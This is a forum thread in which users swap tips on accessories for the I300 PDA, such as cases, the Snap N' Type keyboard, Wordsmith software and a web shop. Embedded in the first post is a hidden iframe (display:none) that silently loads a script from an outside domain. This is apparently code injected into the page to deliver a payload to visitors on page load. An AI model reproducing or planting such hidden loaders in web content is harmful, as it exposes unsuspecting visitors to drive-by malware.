+ Reply to Thread

I300 accessories?

I just got an I300, and I was wondering... are there any accessories that you feel are a must-have to really make the most of it?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thumbs up

Welcome to the club!! I've had my I300 for about six months now and am very satisfied with it. As for accessories; what are you looking to do with it? A leather case is a nice addition; I got one from E&B; it's much bettter than the one included with the PDA. Are you looking to do a lot of work with MS Word, like I do? I find Wordsmith to be an excellent software program that lets you utilize MS Word. Because I do a lot of remote typing (I do field work for a living; I'm rarely in my office or at my PC) I have a Snap N' Type keyboard that is much faster and less tiring than the included soft keyboard on the unit. Describe what you plan to use the unit for in addition to its phone function; I'm sure you'll get input from other owners as well. Good luck with your I300!

Well, my other Palm is a 505. In many ways, the 505 is better than the I300. It has an expansion slot, it's faster, etc... but the ultra-convenience of having everything in one unit supercedes the things that the I300 lacks. With the 505 I had a keyboard (do they make those for the I300?) that I used all the time...
    Do they make screen protectors for the I300? Fellowes made screen protectors for the 505 that I used... I loved them.

I know what you mean about having another PDA; I've got an Ipaq 3955 in addition to the I300. I use it primarily for GPS directions, music, and syncing with some of my work PC files. I enjoy them both equally, but wonder if I'd be happier buying an all in one unit like the XDA II jor Treo 600 when they come out. My biggest reservation about an all in one unit is I would be completely beached if I misplaced or lost that unit; as things stand now, I can get by with one PDA if I lost the other one; there is "insurance" in having two PDAs when you configure them to back up each other's important data. Then there's the price of an all in one unit, be it the new Palm Treo 600 or the aforementioned XDA II. I got my I300 really cheap since it's a dinosaur but it handles most of my needs and for those it doesn't, the Ipaq fills in the gaps. But it's nice to at least have choices, isn't it?

P.S. Did you see the blurb in my previous post about the Snap N' Type keyboard; works like a champ and is made for the I300...
    Last edited by pr0vider; 10-05-2003 at 09:16 PM.

Where did you get your Snap and Type keyboard? Do you know where I could get it cheap online?

Similarly to you, I also got my I300 for ridiculously cheap... because it's a dinosaur, and because it was used... but hey, it's really convenient!

I haven't hooked it up yet, so I don't even know if I like it... I'm waiting to get the sync cable. I can't wait!! I should have it on Tues.

Thanks for writing back to me!

Yarish;

I've (as usual) got to go out of town today but will try and find where I got the Snap N' Type from when I return. Meanwhile, try a Google search, or other search engines; that's how I found mine after reading a positive review of it some time ago. Please post me though if you find a site that sells it. It's not cheap; if I remember correctly mine cost around $40-50 with shipping but you might find them used online at a better price.

Here ya go: StylusCentral.com... I found the packing slip while doing a cursory search of my receipts before I leave. Thomas

Thanks for the link... I'm off to check it out right now!